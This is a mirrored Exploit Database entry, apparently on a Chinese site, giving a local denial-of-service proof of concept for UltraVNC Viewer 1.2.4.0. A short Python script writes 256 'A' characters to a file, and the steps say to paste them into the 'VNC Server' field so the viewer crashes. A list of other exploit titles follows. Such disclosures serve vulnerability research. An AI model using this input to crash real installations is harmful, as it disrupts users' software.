UltraVNC Viewer 1.2.4.0 – ‘VNCServer’ Denial of Service (PoC)

Exploit Database
16 阅读

作者： chuyreds

日期： 2020-04-06
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/48291/

# Exploit Title:UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
# Discovery by: chuyreds 
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
#3.- Open UltraVNC Viewer 
#4.- In "VNC Server" Paste Clipboard
#5.- Click on "Connect"
#6.- Crashed

cod = "\x41" * 256

f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
f.write(cod)
f.close()

last Exploits
UltraVNC Viewer 1.2.4.0 – ‘VNCServer’ Denial of Service (PoC)的更多信息

MP4 Player 4.0 – Local Crash (PoC)：
Microsoft Windows – ‘nt!NtQueryInformationJobObject (information class 12)’ Kernel Stack Memory Disclosure：
TP-Link WR840N 0.9.1 3.16 – Denial of Service (PoC)：
Chrome V8 JIT – Simplified-lowererer IrOpcode::kStoreField, IrOpcode::kStoreElement Optimization Bug：
Google Chrome < M72 - FileWriterImpl Use-After-Free：
Oracle VM VirtualBox 4.0 – ‘tracepath’ Local Denial of Service：
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates：
PHP 5.0.0 – ‘snmpwalkoid()’ Local Denial of Service：